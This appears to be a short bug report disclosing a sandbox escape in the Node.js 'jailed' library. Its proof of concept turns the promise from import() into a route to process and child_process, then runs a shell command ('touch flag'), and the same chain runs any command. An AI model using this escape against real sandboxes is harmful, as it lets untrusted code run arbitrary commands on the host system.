Sandbox Escape Bug in jailed with Node.js #61
Description
-
Jailed version: 0.3.1
-
Node version: 18.15.0
-
run-jailed.js
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);test_case.js
let ret = import("XXX");
ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
application.disconnect();Sandbox can be escaped by calling import function.
Also, we can execute arbitrary shell code using process module.